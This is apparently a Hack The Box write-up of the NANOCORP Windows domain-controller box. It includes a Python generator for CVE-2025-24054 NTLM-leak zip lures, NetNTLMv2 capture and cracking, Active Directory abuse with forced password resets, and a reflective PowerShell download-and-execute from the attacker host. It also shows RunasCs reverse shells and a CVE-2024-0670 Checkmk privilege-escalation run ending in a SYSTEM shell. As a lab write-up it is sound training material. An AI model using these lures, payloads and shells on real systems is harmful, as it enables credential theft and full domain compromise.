Here are my notes on the NANOCORP box from Hack The Box.
NANOCORP: 10.10.11.93
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
nxc ldap 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --dns-tcp --dns-server 10.10.11.93 --bloodhound --collection All
BLOODHOUND DATA:
WEB_SVC@NANOCORP.HTB -> AddSelf -> IT_SUPPORT@NANOCORP.HTB GROUP -> ForceChangePassword -> MONITORING_SVC@NANOCORP.HTB -> CanPSRemote -> DC01.NANOCORP.HTB:
bloodyAD --host "10.10.11.93" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "IT_SUPPORT" "web_svc"
net rpc group members "IT_SUPPORT" -U "nanocorp.htb"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# bloodyAD --host "10.10.11.93" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "IT_SUPPORT" "web_svc"
[+] web_svc added to IT_SUPPORT
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# net rpc group members "IT_SUPPORT" -U "nanocorp.htb"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
NANOCORP\web_svc
bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' set password MONITORING_SVC 'Password123@'
(ForceChangePassword is a reset, not a change: whatever monitoring_svc was running with the old password breaks. Fine on a lab box, noisy on a real engagement.)
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' set password MONITORING_SVC 'Password123@'
[+] Password changed successfully!
faketime -f $(ntpdate -q dc01.nanocorp.htb | awk '{print $4}') bash
(The DC's clock is about 7 hours ahead of Kali; nmap reports clock-skew 6h59m58s further down. Kerberos rejects anything more than 5 minutes out, so every Kerberos step below runs inside this faketime shell.)
getTGT.py nanocorp.htb/monitoring_svc:'Password123@' -dc-ip 10.10.11.93
export KRB5CCNAME=monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# cat /etc/krb5.conf
[libdefaults]
    default_realm = NANOCORP.HTB
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    NANOCORP.HTB = {
        kdc = dc01.nanocorp.htb
        admin_server = dc01.nanocorp.htb
        default_domain = nanocorp.htb
    }

[domain_realm]
    .nanocorp.htb = NANOCORP.HTB
    nanocorp.htb = NANOCORP.HTB
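Added example (my code, not part of the original notes): the clock-skew step above is easy to get wrong by hand, so this small helper reads the two places the skew shows up in the nmap output (the Kerberos banner's "server time: ...Z" and the "|_clock-skew:" host-script line, both quoted from the scan in these notes) and produces the offset string libfaketime expects. The 300-second limit is the default Kerberos clock tolerance; the local time passed to skew_from_server_time is whatever `date -u +%FT%TZ` printed when the scan ran (the value in the sample is an assumption consistent with the banner).

```python
"""Clock-skew helper for the faketime/Kerberos step.

Reads nmap's Kerberos banner and clock-skew line and turns the skew into a
libfaketime relative offset (seconds is libfaketime's default unit).
"""
import re
from datetime import datetime, timezone

KERBEROS_MAX_SKEW = 300  # seconds; beyond this the KDC answers KRB_AP_ERR_SKEW

# Constructed sample: the two relevant lines from the nmap scan in the notes.
SAMPLE_NMAP = (
    "88/tcp open kerberos-sec Microsoft Windows Kerberos "
    "(server time: 2025-11-18 00:30:40Z)\n"
    "|_clock-skew: 6h59m58s\n"
)

# nmap prints durations as [-][Nd][Nh][Nm]Ns, e.g. "6h59m58s", "-1s", "0s".
_DURATION_RE = re.compile(r"(-?)(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(\d+)s\b")
_SERVER_TIME_RE = re.compile(r"server time:\s*(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})Z")


def skew_from_nmap(text: str) -> int:
    """Signed skew in seconds (target minus local) from the clock-skew line."""
    for line in text.splitlines():
        if "clock-skew:" in line:
            m = _DURATION_RE.search(line.split("clock-skew:", 1)[1])
            if not m:
                break
            sign, d, h, mi, s = m.groups()
            total = (int(d or 0) * 86400 + int(h or 0) * 3600
                     + int(mi or 0) * 60 + int(s))
            return -total if sign == "-" else total
    raise ValueError("no clock-skew line in nmap output")


def skew_from_server_time(text: str, local_utc: str) -> int:
    """Skew from the Kerberos banner, given the local UTC time at scan time
    as 'YYYY-mm-ddTHH:MM:SSZ' (the output of `date -u +%FT%TZ`)."""
    m = _SERVER_TIME_RE.search(text)
    if not m:
        raise ValueError("no 'server time' in the Kerberos banner")
    server = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    local = datetime.strptime(local_utc, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return round((server - local).total_seconds())


def needs_faketime(skew: int, tolerance: int = KERBEROS_MAX_SKEW) -> bool:
    """True when the KDC would reject our tickets because of the skew."""
    return abs(skew) > tolerance


def faketime_offset(skew: int) -> str:
    """Relative offset for `faketime -f '<offset>' bash`, e.g. '+25198'."""
    return f"{skew:+d}"


if __name__ == "__main__":
    skew = skew_from_nmap(SAMPLE_NMAP)
    print(f"skew {skew:+d}s, faketime needed: {needs_faketime(skew)}")
    if needs_faketime(skew):
        print(f"faketime -f '{faketime_offset(skew)}' bash")
```

Both parsers should agree on the same scan; when they do not, the banner time is the one that was actually read off the KDC and is the safer value to use.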
evil-winrm -i dc01.nanocorp.htb -r nanocorp.htb   # -r is Kerberos via the ccache (hence the krb5.conf above); only 5986 is open, so it also needs -S -P 5986
python3 winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass   # used instead, talks TLS on 5986 directly
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# getTGT.py nanocorp.htb/monitoring_svc:'Password123@' -dc-ip 10.10.11.93
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# export KRB5CCNAME=monitoring_svc.ccache
┌──(root㉿kali)-[/home/kali/Kali-Tools/winrmexec]
└─# python3 winrmexec.py -ssl -port 5986 -k nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
PS C:\Users\monitoring_svc\Documents> hostname
DC01
USER-SHELL !
https://github.com/ozelis/winrmexec
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://nanocorp.htb/ -H "Host: FUZZ.nanocorp.htb"
[SNIP]
hire [Status: 200, Size: 2520, Words: 646, Lines: 68, Duration: 140ms]
Source code of the main page: http://nanocorp.htb/
[SNIP]
</div>
<div class="row tm-reverse-sm">
<div class="col-sm-12 col-md-8 col-lg-8 col-xl-8">
<p class="mb-4">At Nano Corp, we are committed to excellence. Our team of experts works tirelessly to build cutting-edge solutions. And now, we’re growing.<strong>we are hiring!</strong> Join us in shaping the future of cybersecurity and tech innovation.</p>
<a href="http://hire.nanocorp.htb" class="btn tm-btn-gray">Apply Now</a>
</div>
<div class="col-sm-12 col-md-4 col-lg-4 col-xl-4 mb-lg-0 mb-sm-4 mb-4">
<img src="img/team.jpg" class="img-fluid">
</div>
</div>
hire.nanocorp.htb looks interesting.
hire.nanocorp.htb:
Upload Your Resume (Zip File Only):
Plan: generate a document that forces the server to authenticate to us over SMB (a UNC path inside the file), zip it, and catch the NetNTLMv2 hash with Responder.
python3 ntlm_theft.py --generate all --server 10.10.14.148 --filename resume
Close enough, but the actual trigger is CVE-2025-24054: NTLM hash disclosure through a .library-ms file carried inside the uploaded zip.
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
https://www.exploit-db.com/exploits/52280
https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC
https://github.com/reloc2/CVE-2025-24054
https://medium.com/@chintalatarakaram/%EF%B8%8F-cve-2025-24054-actively-exploited-vulnerability-stealing-ntlm-credentials-what-you-need-to-631ac46f45e3
┌──(root㉿kali)-[/home/kali/Kali-Tools/CVE-2025-24054]
└─# python3 poc.py
Enter your file name: resume
Enter IP (EX: 192.168.1.162): 10.10.14.148
completed
┌──(root㉿kali)-[/home/kali/Kali-Tools/CVE-2025-24054]
└─# ls
exploit.zip poc.py README.md
┌──(root㉿kali)-[/home/kali/Kali-Tools/CVE-2025-24054]
└─# mv exploit.zip resume.zip
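Added example (my code, not the page's poc.py and not the linked PoC authors' code): what the generated exploit.zip contains, built with the standard library. The lure is a .library-ms whose search-connector location is a UNC path on the attacker host, so a Windows machine that handles the file opens an SMB session to that host and authenticates; the share name "share" is an assumption (any name works, since NTLM authentication happens before the share is looked up), and the attacker IP is the one used in these notes.

```python
"""Build a CVE-2025-24054 lure: <name>.library-ms inside a zip.

The XML mirrors what the public PoCs generate; lure_target() reads the UNC
path back out of the archive as a sanity check before uploading it.
"""
import io
import ipaddress
import xml.etree.ElementTree as ET
import zipfile

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"


def library_ms(attacker_ip: str, share: str = "share") -> str:
    """Return the .library-ms XML pointing at \\\\<attacker_ip>\\<share>."""
    ipaddress.ip_address(attacker_ip)  # refuse junk before it lands in a file
    unc = f"\\\\{attacker_ip}\\{share}"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIBRARY_NS}">\n'
        "  <searchConnectorDescriptionList>\n"
        "    <searchConnectorDescription>\n"
        "      <simpleLocation>\n"
        f"        <url>{unc}</url>\n"
        "      </simpleLocation>\n"
        "    </searchConnectorDescription>\n"
        "  </searchConnectorDescriptionList>\n"
        "</libraryDescription>\n"
    )


def build_zip(attacker_ip: str, name: str = "resume") -> bytes:
    """Zip <name>.library-ms in memory and return the archive bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}.library-ms", library_ms(attacker_ip))
    return buf.getvalue()


def zip_members(archive: bytes) -> list:
    """Member names of an archive (what the upload handler will see)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.namelist()


def lure_target(archive: bytes) -> str:
    """Parse the .library-ms back out of the archive and return its UNC path."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        member = next(n for n in zf.namelist() if n.endswith(".library-ms"))
        root = ET.fromstring(zf.read(member))
    return root.find(f".//{{{LIBRARY_NS}}}url").text


if __name__ == "__main__":
    data = build_zip("10.10.14.148")
    with open("resume.zip", "wb") as f:
        f.write(data)
    print("resume.zip ->", lure_target(data))
```

Keep the member name matching what the form expects (here a "resume"); the archive is otherwise a plain deflate zip, so nothing about it looks unusual to the upload handler.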
Upload resume.zip to hire.nanocorp.htb with Responder already listening; the DC connects back to the SMB share and Responder captures the NetNTLMv2 hash.
sudo responder -I tun0
[SNIP]
[SMB] NTLMv2-SSP Client : 10.10.11.93
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:b53088f56241089d:0D6B979ABAC95CD3CBAA095D78AD4F07:010100000000000080ACE1891858DC013DEB2ABFBB9B83340000000002000800500055005300490001001E00570049004E002D004A003600380044004200350046004B0052005400390004003400570049004E002D004A003600380044004200350046004B005200540039002E0050005500530049002E004C004F00430041004C000300140050005500530049002E004C004F00430041004C000500140050005500530049002E004C004F00430041004C000700080080ACE1891858DC0106000400020000000800300030000000000000000000000000200000D3C8C6BA64638A0ECF4ACD2BFAA2DEF3B115DBF17FDA1D541FEE6B2C0C155BF50A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
web_svc::NANOCORP:b53088f56241089d:0D6B979ABAC95CD3CBAA095D78AD4F07:010100000000000080ACE1891858DC013DEB2ABFBB9B83340000000002000800500055005300490001001E00570049004E002D004A003600380044004200350046004B0052005400390004003400570049004E002D004A003600380044004200350046004B005200540039002E0050005500530049002E004C004F00430041004C000300140050005500530049002E004C004F00430041004C000500140050005500530049002E004C004F00430041004C000700080080ACE1891858DC0106000400020000000800300030000000000000000000000000200000D3C8C6BA64638A0ECF4ACD2BFAA2DEF3B115DBF17FDA1D541FEE6B2C0C155BF50A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dksehdgh712!@# (web_svc)
1g 0:00:00:02 DONE (2025-11-17 23:37) 0.4149g/s 769912p/s 769912c/s 769912C/s dobson5499..djcward
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
web_svc:dksehdgh712!@#
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-18 00:30:40Z)
sudo GetNPUsers.py -no-pass -dc-ip 10.10.11.93 -usersfile users.txt nanocorp.htb/
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# sudo GetNPUsers.py -no-pass -dc-ip 10.10.11.93 -usersfile users.txt nanocorp.htb/
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User web_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
#NOPE: nothing is AS-REP roastable (no account has UF_DONT_REQUIRE_PREAUTH; the two KDC_ERR_CLIENT_REVOKED entries are disabled or locked-out accounts). users.txt is the SidTypeUser list produced with lookupsid.py in the 445 section below.
nxc ldap 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --kerberoasting output.txt
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/10.10.11.93]
└─# nxc ldap 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --kerberoasting output.txt
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.93 389 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
LDAP 10.10.11.93 389 DC01 Bypassing disabled account krbtgt
LDAP 10.10.11.93 389 DC01 No entries found!
LDAP 10.10.11.93 389 DC01 [-] Error with the LDAP account used
#NOPE: "No entries found" means no user account carries an SPN, so there is nothing to Kerberoast. The trailing "Error with the LDAP account used" is misleading: the bind succeeded two lines up, and the real result is the empty SPN query.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/NANOCORP/10.10.11.93/BLOOD]
└─# nxc smb 10.10.11.93 -u web_svc -p 'dksehdgh712!@#' --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
sudo lookupsid.py web_svc@10.10.11.93 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after: 2026-04-06T23:18:43
PS C:\Users\monitoring_svc\Desktop> whoami
nanocorp\monitoring_svc
PS C:\Users\monitoring_svc\Desktop> hostname
DC01
PS C:\Users\monitoring_svc\Desktop> dir
Directory: C:\Users\monitoring_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/18/2025 4:46 PM 34 user.txt
PS C:\Users\monitoring_svc\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
donut -f 1 -o shell.bin -a 2 -i shell.exe
base64 -w 0 shell.bin | xclip -sel clip
var shellcode = Convert.FromBase64String("<base64 content here>");
ShellCode.ShellCodeExecute(shellcode);
dotnet bin/Debug/netcoreapp3.1/SharpGen.dll -f payload.exe -s contents.txt -C shell -d net40
[SNIP]
[*] Compiled assembly written to: /home/kali/BOXES/NANOCORP/SharpGen/Output/payload.exe
$bytes = (new-object net.webclient).downloaddata("http://10.10.14.148/payload.exe")
[System.Reflection.Assembly]::Load($bytes)
$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static"
$main = [Shell].getmethod("Main", $BindingFlags)
$main.Invoke($null, $null)
#NOPE: no shell from the reflective load.
A plain reverse shell via RunasCs works as usual (catch it with: sudo rlwrap nc -lnvp 4444):
RunasCs.exe web_svc 'dksehdgh712!@#' powershell.exe -r 10.10.14.148:4444
RunasCs.exe web_svc dksehdgh712!@# powershell.exe -r 10.10.14.148:4444 #WORKS ! (no quotes around the password: if the command line goes through cmd.exe, single quotes are literal and end up as part of the password)
CVE-2024-0670 CHECKMK PRIV ESC NOTES: #NANOCORP-HTB
PS C:\Program Files (x86)> whoami
whoami
nanocorp\web_svc
PS C:\Program Files (x86)> hostname
hostname
DC01
PS C:\Program Files (x86)> dir
dir
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/5/2025 4:17 PM checkmk #Interesting
d----- 5/8/2021 1:34 AM Common Files
d----- 11/3/2025 4:13 PM Internet Explorer
d----- 5/8/2021 2:40 AM Microsoft
Check MK Agent 2.1 is installed (the exploit output below prints the version), which is in the range affected by CVE-2024-0670, a local privilege escalation in the Checkmk Windows agent's MSI repair. The PoC "seeds" directories for PIDs 1000-10000 so that whichever PID the SYSTEM-level repair process gets, it finds attacker-controlled content, then triggers an MSI repair of the agent package; the planted payload connects back to LHOST:LPORT as SYSTEM.
https://github.com/elsevar11/CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit
exploit.ps1:
[SNIP]
param(
[int]$MinPID = 1000,
[int]$MaxPID = 10000,
[string]$LHOST = "10.10.14.148",
[string]$LPORT = "4444"
)
[SNIP]
.\RunasCs.exe web_svc dksehdgh712!@# "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
[*] Scanning for Check MK-related MSI files (SYSTEM-owned)...
[*] Successfully found Check MK MSI!
[*] Software Name: Check MK Agent 2.1
[*] MSI Path: C:\Windows\Installer\1e6f2.msi
[*] Seeding 1000 to 10000...
[*] Seeding complete.
[*] Triggering MSI repair for Check MK...
[*] Sucessful!
┌──(root㉿kali)-[/home/kali/BOXES/NANOCORP/CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit]
└─# sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.148] from (UNKNOWN) [10.10.11.93] 53913
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
DC01
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2EB6-7759
Directory of C:\Users\Administrator\Desktop
04/09/2025 05:13 PM <DIR> .
04/12/2025 12:45 PM <DIR> ..
11/18/2025 04:46 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4,828,299,264 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
54028/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54033/tcp open msrpc Microsoft Windows RPC
54055/tcp open msrpc Microsoft Windows RPC
56340/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
----------------------Starting UDP Scan------------------------
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2025-11-18T00:30:58
|_ start_date: N/A
